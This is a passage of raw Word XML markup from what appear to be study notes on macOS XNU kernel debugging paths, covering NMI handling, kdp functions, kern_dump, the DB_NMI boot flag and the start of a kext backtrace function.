          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00935551" w:rsidRPr="00935551" w:rsidRDefault="00935551" w:rsidP="00935551">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:leftChars="600" w:left="1320"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">         radix</w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00935551">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* default radix - for '%r' */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00935551" w:rsidRPr="00935551" w:rsidRDefault="00935551" w:rsidP="00935551">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00935551" w:rsidRPr="00935551" w:rsidRDefault="00935551" w:rsidP="00935551">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A70EE9" w:rsidRPr="00935551" w:rsidRDefault="00A70EE9" w:rsidP="00A70EE9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:leftChars="293" w:left="645" w:firstLine="415"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A80D58" w:rsidRPr="00A80D58" w:rsidRDefault="00A80D58" w:rsidP="00A80D58">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A80D58">
        <w:t>NMIInterruptHandler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C51F7" w:rsidRDefault="00A80D58" w:rsidP="003C51F7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A80D58">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\osfmk\i386\mp.c</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="0" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="9BB3CD"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="9BB3CD"/>
        </w:tblBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tblCellMar>
          <w:top w:w="50" w:type="dxa"/>
          <w:left w:w="50" w:type="dxa"/>
          <w:bottom w:w="50" w:type="dxa"/>
          <w:right w:w="50" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1071"/>
        <w:gridCol w:w="838"/>
        <w:gridCol w:w="6747"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A80D58" w:rsidRPr="00A80D58" w:rsidTr="00A80D58">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A80D58" w:rsidRPr="00A80D58" w:rsidRDefault="00A80D58" w:rsidP="00A80D58">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A80D58">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
                <w:color w:val="666666"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DB_NMI</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A80D58" w:rsidRPr="00A80D58" w:rsidRDefault="00A80D58" w:rsidP="00A80D58">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A80D58">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>0x04</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rsidR="00A80D58" w:rsidRPr="00A80D58" w:rsidRDefault="00A80D58" w:rsidP="00A80D58">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A80D58">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Drop into debugger on NMI (Command–Power, Command-Option-Control-Shift-Escape, or interrupt switch).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A80D58" w:rsidRDefault="00A80D58" w:rsidP="00A80D58">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00582644">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NMIInterruptHandler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80D58" w:rsidRPr="00582644" w:rsidRDefault="00A80D58" w:rsidP="00582644">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00582644">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>kdp_i386_trap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00403D90" w:rsidRDefault="00403D90" w:rsidP="00403D90">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00582644">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>kdp_raise_exception</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B568BE" w:rsidRDefault="00B568BE" w:rsidP="00B568BE">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="840" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C51F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>kdp_debugger_loop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B568BE" w:rsidRDefault="00B568BE" w:rsidP="00B568BE">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:leftChars="593" w:left="1305" w:firstLine="415"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>kdp_panic_dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00752581" w:rsidRPr="00752581" w:rsidRDefault="00752581" w:rsidP="00752581">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:leftChars="593" w:left="1305" w:firstLine="415"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00752581">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>kern_dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B568BE" w:rsidRDefault="00B568BE" w:rsidP="00B568BE">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:leftChars="593" w:left="1305" w:firstLine="415"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>kdp_machine_reboot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B568BE" w:rsidRPr="003C51F7" w:rsidRDefault="00B568BE" w:rsidP="00B568BE">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:leftChars="593" w:left="1305" w:firstLine="415"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>kdp_connection_wait</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00752581" w:rsidRPr="00752581" w:rsidRDefault="00752581" w:rsidP="00752581">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00752581">
        <w:t>kern_dump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B568BE" w:rsidRPr="00B568BE" w:rsidRDefault="00B568BE" w:rsidP="00403D90">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C4D4E" w:rsidRPr="003C4D4E" w:rsidRDefault="00E07498" w:rsidP="003C4D4E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="003C4D4E" w:rsidRPr="003C4D4E">
        <w:t>Debugger( const char  *message)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80D58" w:rsidRDefault="003C4D4E" w:rsidP="003C51F7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Debugger</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C4D4E" w:rsidRDefault="003C4D4E" w:rsidP="003C4D4E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Debugger called: &lt;%s&gt;\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C4D4E" w:rsidRDefault="003C4D4E" w:rsidP="003C4D4E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>kprintf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Debugger called: &lt;%s&gt;\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010480E" w:rsidRPr="001A3110" w:rsidRDefault="0010480E" w:rsidP="0010480E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>printKextsInBacktrace</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010480E" w:rsidRDefault="0010480E" w:rsidP="003C4D4E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0010480E" w:rsidRPr="0010480E" w:rsidRDefault="0010480E" w:rsidP="0010480E">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OSKext</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>printKextsInBacktrace</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vm_offset_t</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unsigned</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cnt</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0010480E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
